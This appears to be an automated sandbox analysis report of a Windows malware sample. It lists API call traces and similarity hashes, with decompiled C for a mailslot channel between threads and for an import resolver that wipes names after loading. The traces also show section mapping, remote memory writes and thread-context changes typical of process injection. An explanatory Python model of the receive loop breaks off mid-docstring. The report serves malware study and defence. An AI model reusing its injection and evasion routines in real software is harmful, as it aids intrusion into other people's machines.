  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0; // bytes received so far
				_v8 = 0x1000;
				// Receiving end of the IPC channel: maximum message size 0x1000, read timeout 0 (ReadFile returns at once when nothing is queued)
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000); // first 0x1000-byte buffer from the private heap (RtlAllocateHeap, see the subcall below)
					if(_t36 == 0) {
						L10:
						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed; one mailslot message per call, appended at offset _t39
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) { // ERROR_SEM_TIMEOUT: no message queued yet, keep polling
									_v16 = 0x1000; // pretend a full chunk was read so the loop condition stays true
									goto L8;
								}
								// any other ReadFile error falls through to "goto L11" with _v8 holding the code
							} else {
								_v12 = _v12 + 0x1000; // grow the buffer by one chunk
								_t39 = _t39 + _v16; // advance the write offset by the bytes just read
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000; // a successful read clears a status left by an earlier timeout
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed; 100 ms between polls
						} while (_v16 == 0x1000); // a full chunk means more may follow; a short message ends the transfer
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) { // hand the assembled buffer and its length back through the caller's context block
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}
(Per-line instruction address column for E00401033 above, covering 0x00401033 to 0x004010F8, omitted here.)

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
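E00401033 above is the receiving side of a mailslot channel: it allocates one 0x1000-byte chunk, reads one message per ReadFile call, grows the heap block by 0x1000 after every successful read, keeps polling every 100 ms while ReadFile fails with 0x79 (ERROR_SEM_TIMEOUT, the result of a zero read timeout with nothing queued), and stops at the first short message. The Python below is an added example, not code from the report or from the sample: it replays that control flow with the Win32 calls replaced by a constructed in-memory mailslot so it runs off Windows, adds the sender-side framing the loop implies, and adds two guards the original lacks (a poll limit and an allocation cap). FakeMailslot, frame(), receive() and the guard parameters are this example's own assumptions.

```python
"""Model of E00401033's mailslot receive loop.

Added example, not code from the report. CHUNK, ERROR_SEM_TIMEOUT (0x79) and
ERROR_NOT_ENOUGH_MEMORY (8) are the values visible in the decompiled function;
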